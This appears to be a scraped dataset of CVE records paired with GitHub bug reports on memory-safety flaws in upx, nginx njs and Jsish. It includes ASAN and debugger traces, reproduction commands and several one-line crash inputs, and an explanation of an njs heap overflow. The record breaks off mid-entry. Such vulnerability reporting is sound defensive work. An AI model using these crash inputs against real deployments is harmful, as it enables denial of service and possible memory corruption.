#4 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4800
#5 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4817
#6 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4828
#7 0x4f337a in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
#8 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
#9 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
#10 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
#11 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
#12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
#13 0x7ff33c8dc82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#14 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)
0x61600000fed9 is located 1 bytes to the right of 600-byte region [0x61600000fc80,0x61600000fed8)
allocated by thread T0 here:
#0 0x7ff33d4d0602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1688 PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*)
Shadow bytes around the buggy address:
0x0c2c7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2c7fff9f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa
0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2c7fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==110358==ABORTING
```
Then analysis the reasons for segv by debugging:
```bash
Program received signal SIGSEGV, Segmentation fault.
0x0000000000527258 in PackLinuxElf32::invert_pt_dynamic (this=this@entry=0xa00030, dynp=<optimized out>) at p_lx_elf.cpp:1688
1688 if (buckets[j]) {
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000a009c1 → 0x00000000ffffffff
$rbx : 0x0000000000a00030 → 0x00000000007267a0 → <vtable+0> add BYTE PTR [rax], al
$rcx : 0x0
$rdx : 0x0
$rsp : 0x00007fffffffcc10 → 0x0000000000a007c0 → 0xff0000010900457f
$rbp : 0xffffff00
$rsi : 0x7d88
$rdi : 0x6
$rip : 0x0000000000527258 → <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR [rax+rsi*4+0x1c]
$r8 : 0x0
$r9 : 0x0
$r10 : 0x10
$r11 : 0x0
$r12 : 0xd
$r13 : 0xffffffff
$r14 : 0x200
$r15 : 0x0
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc10│+0x0000: 0x0000000000a007c0 → 0xff0000010900457f ← $rsp
0x00007fffffffcc18│+0x0008: 0x0000000000000000
0x00007fffffffcc20│+0x0010: 0x00007ffff7352260 → <read+16> cmp rax, 0xfffffffffffff001
0x00007fffffffcc28│+0x0018: 0x0000000000000258
0x00007fffffffcc30│+0x0020: 0x00007ffff7362447 → <lseek64+7> cmp rax, 0xfffffffffffff001
0x00007fffffffcc38│+0x0028: 0x00000000005255b2 → <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR [rsp+0x10]
0x00007fffffffcc40│+0x0030: 0x0000000000000000
0x00007fffffffcc48│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x527247 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rcx, QWORD PTR [rsp+0x8]
0x52724c <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rdx, QWORD PTR [rsp]
0x527250 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp+0x98]
→ 0x527258 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR [rax+rsi*4+0x1c]
0x52725d <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> test r9d, r9d
0x527260 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> je 0x5272eb <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*)+7515>
0x527266 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> xchg ax, ax
0x527268 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp-0x98]
0x527270 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp], rdx
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:p_lx_elf.cpp+1688 ────
1683 unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr;
1684 //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except:
1685 // Rust and Android trim unused zeroes from high end of hasharr[]
1686 unsigned bmax = 0;
1687 for (unsigned j= 0; j < n_bucket; ++j) {
→ 1688 if (buckets[j]) {
1689 if (buckets[j] < symbias) {
1690 char msg[50]; snprintf(msg, sizeof(msg),
1691 "bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n",
1692 buckets[j], symbias);
1693 throwCantPack(msg);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x527258 → PackLinuxElf32::invert_pt_dynamic(this=0xa00030, dynp=<optimized out>)
[#1] 0x529294 → PackLinuxElf32::invert_pt_dynamic(dynp=<optimized out>, this=0xa00030)
[#2] 0x529294 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce20)
[#3] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce20, this=0xa00030)
[#4] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce20, this=0xa00030)
[#5] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce20, this=0xa00030)
[#6] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce20)
[#7] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce20, o=0x7fffffffcfd8, user=0x7fffffffce20)
[#8] 0x6072ca → PackMaster::getUnpacker(f=<optimized out>)
[#9] 0x6072ca → PackMaster::unpack(this=0x7fffffffcfc0, fo=0x7fffffffcef0)
```
The instruction to crash is, corresponds to the bucket [j] in the source code
```bash
mov r9d, DWORD PTR [rax+rsi*4+0x1c]
```
The value of register rax and rsi are:
```bash
$rax : 0x0000000000a009c1
$rsi : 0x7d88
```
The DWORD PTR pointer to 0xa1fffd, where the 0xa20000 is a invalid address.
```bash
gef➤ x /10xg 0xa1fffd
0xa1fffd: Cannot access memory at address 0xa20000
```
## What should have happened?
Decompress a crafted/suspicious file.
## Do you have an idea for a solution?
A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited.
```cpp
unsigned const *const bitmask = (unsigned const *)(void const *)&gashtab[4];
unsigned const *const buckets = (unsigned const *)&bitmask[n_bitmask];
unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr;
//unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except:
// Rust and Android trim unused zeroes from high end of hasharr[]
unsigned bmax = 0;
for (unsigned j= 0; j < n_bucket; ++j) {
if (buckets[j]) {
```
## How can we reproduce the issue?
1. compile upx with address-sanitize
2. execute cmd
```bash
upx.out -df $PoC -o /dev/null
```
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32%5E%25%5E%25invert_pt_dynamic) can be found here.
## Please tell us details about your environment.
* UPX version used (`upx --version`):
```bash
upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43
```
* Host Operating System and version:
Ubuntu 16.04 64-bit
* Host CPU architecture:
Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
* Target Operating System and version:
same as Host
* Target CPU architecture:
same as Host | [bug]heap buffer overflow in PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688 | https://api.github.com/repos/upx/upx/issues/378/comments | 2 | 2020-05-23T14:19:31Z | 2023-04-17T18:19:24Z | https://github.com/upx/upx/issues/378 | 623,670,052 | 378 |
CVE-2021-43316 | 2023-03-24T20:15:08.460 | A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le64(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/381"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/381 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le64(). The issue can cause a denial of service. The issue is diff from [issue367](https://github.com/upx/upx/issues/367) and [issue368](https://github.com/upx/upx/issues/368)
ASAN reports:
```bash
ASAN:SIGSEGV
=================================================================
==113201==ERROR: AddressSanitizer: SEGV on unknown address 0x630011d04b20 (pc 0x0000005292e0 bp 0x000000000022 sp 0x7ffebc640bc8 T0)
#0 0x5292df in get_le64(void const*) /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:193
#1 0x5292df in N_BELE_RTP::LEPolicy::get64(void const*) const /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:194
#2 0x45784b in Packer::get_te64(void const*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:297
#3 0x45784b in PackLinuxElf64::elf_lookup(char const*) const /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5423
#4 0x46f7eb in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:805
#5 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:407
#6 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1008
#7 0x4f34b2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194
#8 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
#9 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
#10 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
#11 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
#12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
#13 0x7fc4129b682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#14 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:193 get_le64(void const*)
==113201==ABORTING
```
The essential cause of the bug is at PackLinuxElf64 :: elf_lookup () at p_lx_elf: 5423:
```cpp
upx_uint64_t const w = get_te64(&bitmask[(n_bitmask -1) & (h>>6)]);
```
## What should have happened?
Decompress a crafted/suspicious file.
## Do you have an idea for a solution?
We are very grateful to @jreiser for patching the bucket in p_lx_elf.cpp in the [issue 367](https://github.com/upx/upx/issues/365). However, in fact, all places involving get_te64 () should be strengthened in upx, especially in p_lx_elf.cpp. The position we reported should be patched at least:
position in PackLinuxElf64::elf_lookup() at p_lx_elf:5423
```cpp
upx_uint64_t const w = get_te64(&bitmask[(n_bitmask -1) & (h>>6)]);
```
## How can we reproduce the issue?
1. compile upx with address-sanitize
2. execute cmd
```bash
upx.out -df $PoC -o /dev/null
```
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__elf_lookup5423) can be found here.
## Please tell us details about your environment.
* UPX version used (`upx --version`):
```bash
upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43
```
* Host Operating System and version:
Ubuntu 16.04 64-bit
* Host CPU architecture:
Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
* Target Operating System and version:
same as Host
* Target CPU architecture:
same as Host
| [bug] segv fault in get_le64() | https://api.github.com/repos/upx/upx/issues/381/comments | 2 | 2020-05-23T14:28:34Z | 2023-04-17T18:34:13Z | https://github.com/upx/upx/issues/381 | 623,671,725 | 381 |
CVE-2020-19692 | 2023-04-04T15:15:07.653 | Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/nginx/njs/issues/187"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:2019-06-27:*:*:*:*:*:*:*",
"matchCriteriaId": "76C92D85-F51F-4CD4-8DC4-BD4428A3C0E1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/187 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"nginx",
"njs"
] | # env
ubuntu 18.04
njs 0feca92
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)
# bug
So, actually this is a logic bug, happened under an really interesting circumstance.
the buggy function is the njs_module_read in the file njs_module.c
```c
if (fstat(fd, &sb) == -1) {
goto fail;
}
text->length = nxt_length(NJS_MODULE_START);
if (S_ISREG(sb.st_mode) && sb.st_size) {
text->length += sb.st_size;
}
text->length += nxt_length(NJS_MODULE_END);
text->start = nxt_mp_alloc(vm->mem_pool, text->length);
if (text->start == NULL) {
goto fail;
}
p = nxt_cpymem(text->start, NJS_MODULE_START, nxt_length(NJS_MODULE_START));
n = read(fd, p, sb.st_size);
```
as you can see, it read the sb.st_size and sb.st_mode with function fstat. However if we dont provide a common .js file. the S_ISREG(sb.st_mode) will be 0. text->length wont be updated.
and read(fd, p, sb.st_size); still read sb.st_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....
# poc
```
import crypto from '/'
``` | Heap based buffer overflow in njs_module.c | https://api.github.com/repos/nginx/njs/issues/187/comments | 2 | 2019-06-29T03:51:34Z | 2024-05-29T06:53:25Z | https://github.com/nginx/njs/issues/187 | 462,261,788 | 187 |
CVE-2020-19695 | 2023-04-04T15:15:07.747 | Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/188"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19A4B578-8508-4F14-AF9A-8C6AF2CB12C6",
"versionEndExcluding": "0.3.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginx:njs:2019-06-27:*:*:*:*:*:*:*",
"matchCriteriaId": "76C92D85-F51F-4CD4-8DC4-BD4428A3C0E1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/188 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | # env
ubuntu 18.04
njs 0feca92
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)
built with ASAN on
# bug
```javascript
> (1..__proto__.length = '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
=================================================================
==13918==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000407181 bp 0x7ffdf2511450 sp 0x7ffdf2511430 T0)
#0 0x407180 in nxt_lvlhsh_find nxt/nxt_lvlhsh.c:181
#1 0x4479b7 in njs_object_property njs/njs_object_property.c:757
#2 0x4210c2 in njs_primitive_value njs/njs_vm.c:2987
#3 0x4206ec in njs_vmcode_string_argument njs/njs_vm.c:2864
#4 0x41473f in njs_vmcode_interpreter njs/njs_vm.c:159
#5 0x412c4e in njs_vm_start njs/njs.c:594
#6 0x404a75 in njs_process_script njs/njs_shell.c:771
#7 0x40387b in njs_interactive_shell njs/njs_shell.c:501
#8 0x402ad1 in main njs/njs_shell.c:271
``` | Array elements left uninitialized in Array.prototype.slice() for primitive this values. | https://api.github.com/repos/nginx/njs/issues/188/comments | 5 | 2019-07-03T02:04:01Z | 2019-07-03T14:22:16Z | https://github.com/nginx/njs/issues/188 | 463,508,475 | 188 |
CVE-2020-23258 | 2023-04-04T15:15:08.303 | An issue found in Jsish v.3.0.11 allows a remote attacker to cause a denial of service via the Jsi_ValueIsNumber function in ./src/jsiValue.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/12"
},
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=2ba1d89d32"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "DC1BDF14-06F9-4F4F-86E9-CAC99C31A7BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/pcmacdon/jsish/issues/12 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 03:55:46:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
var v1 = new Array((()=>"toString")(), []);
v1.find(isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
456 return (pv->vt == JSI_VT_NUMBER || (pv->vt == JSI_VT_OBJECT && pv->d.obj->ot == JSI_OT_NUMBER));
(gdb) bt
#0 0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
#1 0x00005555555cfd3e in isFiniteCmd (interp=0x555555865260,
args=0x5555558c74f0, _this=0x5555558c7530, ret=0x7fffffff59e8,
funcPtr=0x55555588b110) at ./src/jsiCmds.c:1094
#2 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:799
#3 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:823
#4 0x00005555555bc062 in jsi_ArrayFindSubCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0, op=1) at ./src/jsiArray.c:584
#5 0x00005555555bc5dc in jsi_ArrayFindCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0) at ./src/jsiArray.c:659
#6 0x0000555555616285 in jsi_FunctionSubCall (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
tocall=0x5555558c1340, discard=1) at ./src/jsiEval.c:857
#7 0x0000555555616767 in jsiEvalFunction (ps=0x5555558c09d0,
ip=0x5555558c25b0, discard=1) at ./src/jsiEval.c:918 | Illegal memory dereference in isFiniteCmd | https://api.github.com/repos/pcmacdon/jsish/issues/12/comments | 2 | 2020-05-11T15:54:15Z | 2020-05-13T06:32:08Z | https://github.com/pcmacdon/jsish/issues/12 | 615,992,898 | 12 |
CVE-2020-23259 | 2023-04-04T15:15:08.340 | An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the Jsi_Strlen function in the src/jsiChar.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/13"
},
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=b6bb078e00"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*",
"matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.11",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/pcmacdon/jsish/issues/13 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 05:31:25:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
new Array(- 256, 0, - 2.0).forEach(encodeURI);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
(gdb) bt
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x00005555555b37d4 in Jsi_Strlen (str=0x0) at ./src/jsiChar.c:29
#2 0x00005555555cfdd2 in url_encode (str=0x0) at ./src/jsiCmds.c:1103
#3 0x00005555555d0062 in EncodeURICmd (interp=0x555555865260,
args=0x5555558c6b50, _this=0x5555558c6b90, ret=0x7fffffff5ba0,
funcPtr=0x55555588a510) at ./src/jsiCmds.c:1143
#4 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:799
#5 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:823
Found by Dongzhuo Zhao working with ADLab of Venustech | Null pointer dereference in url_encode | https://api.github.com/repos/pcmacdon/jsish/issues/13/comments | 1 | 2020-05-11T16:11:11Z | 2020-05-11T23:41:23Z | https://github.com/pcmacdon/jsish/issues/13 | 616,004,519 | 13 |
CVE-2020-23260 | 2023-04-04T15:15:08.373 | An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the StringReplaceCmd function in the src/jsiChar.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
